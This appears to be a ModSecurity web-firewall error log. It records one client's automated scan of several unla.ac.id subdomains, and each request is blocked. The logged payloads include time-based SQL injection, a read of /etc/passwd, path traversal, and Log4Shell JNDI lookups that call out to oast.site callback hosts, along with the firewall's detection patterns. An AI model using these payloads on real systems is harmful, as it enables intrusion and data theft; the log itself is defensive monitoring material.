[Tue Aug 29 11:32:36.382805 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARA7aEAAAAA"]
[Tue Aug 29 11:32:36.385480 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARH7H8AAAAM"]
[Tue Aug 29 11:32:36.406312 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQ9H4gAAAAK"]
[Tue Aug 29 11:32:37.400229 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAN9sXIAAAAJ"]
[Tue Aug 29 11:32:37.409347 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAQ9H4kAAAAK"]
[Tue Aug 29 11:32:37.426796 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARNk5UAAAAS"]
[Tue Aug 29 11:32:37.447692 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARMMcQAAAAR"]
[Tue Aug 29 11:32:37.451131 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARNk5YAAAAS"]
[Tue Aug 29 11:32:37.517716 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAPDoHwAAAAP"]
[Tue Aug 29 11:32:38.348338 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARMMcwAAAAR"]
[Tue Aug 29 11:32:38.349403 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARA7aUAAAAA"]
[Tue Aug 29 11:32:38.357261 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQOv@wAAAAw"]
[Tue Aug 29 11:32:38.363064 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARIwJkAAAAO"]
[Tue Aug 29 11:32:38.387408 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQOv@0AAAAw"]
[Tue Aug 29 11:32:38.407758 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQOv@4AAAAw"]
[Tue Aug 29 11:32:38.408556 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQ9H5UAAAAK"]
[Tue Aug 29 11:32:38.426878 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQOv@8AAAAw"]
[Tue Aug 29 11:32:38.445729 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARH7I4AAAAM"]
[Tue Aug 29 11:32:38.447948 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARA7akAAAAA"]
[Tue Aug 29 11:32:39.307689 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1058Co-f0AAARQ31wAAAAB"]
[Tue Aug 29 11:32:39.362939 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO1058Co-f0AAAQ9H58AAAAK"]
[Tue Aug 29 11:32:40.405340 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlge1p1p1c1zjkk1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAPDoIQAAAAP"]
[Tue Aug 29 11:32:40.406646 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgscxwoecf63k59.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARMMdoAAAAR"]
[Tue Aug 29 11:32:40.415649 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlggbcph18qz5sur.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAQ9H6AAAAAK"]
[Tue Aug 29 11:32:40.419386 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg4pq9kwk1dm9fn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAQOv-QAAAAw"]
[Tue Aug 29 11:32:40.427315 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgyapjyx7dzgmb1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARMMdsAAAAR"]
[Tue Aug 29 11:32:40.495997 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgabwfadtqr8gxh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAN9sX8AAAAJ"]
[Tue Aug 29 11:32:42.479723 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARA7bQAAAAA"]
[Tue Aug 29 11:32:42.483123 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARD1PsAAAAH"]
[Tue Aug 29 11:32:42.490483 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARH7JYAAAAM"]
